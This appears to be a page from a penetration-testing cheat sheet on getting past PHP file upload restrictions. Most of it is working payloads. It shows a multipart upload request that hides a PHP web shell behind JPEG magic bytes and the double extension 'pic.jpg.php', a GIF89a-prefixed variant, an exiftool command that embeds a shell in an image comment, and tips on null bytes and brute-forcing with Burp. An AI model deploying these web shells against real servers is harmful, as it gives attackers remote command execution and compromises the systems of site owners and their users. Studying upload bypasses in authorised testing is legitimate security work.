File Upload

PHP file upload bypass

  • Use MIME type (magic bytes of an image file). Upload a simple image file and only keep the first few bytes of the content and change the file name to "pic.jpg.php" while keeping the Content-Type: image/jpeg.

// Some code

Content-Disposition: form-data; name="imagen"; filename="pic.jpg.php"
Content-Type: image/jpeg

// Base64 decode this line before sending the request
/9j/4AAQSkZJRgABAQEAYABgAAD//gA7Q1JFQVRPUjogZ2QtanBlZyB2MS4wICh1c2luZyBJSkcgSlBFRyB2OTApLCBxdWFsaXR5ID0gOTAK/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgAyADIAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJ
<?php echo system($_REQUEST['cmd']);?>
// GIF89a; header
GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

  • Exiftool

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
mv file.jpg file.php.jpg

  • Add special characters, null bytes. Use burp to bruteforce.

  • Use double extensions to deceive

PreviousFile InclusionNextInsecure Deserialization

Last updated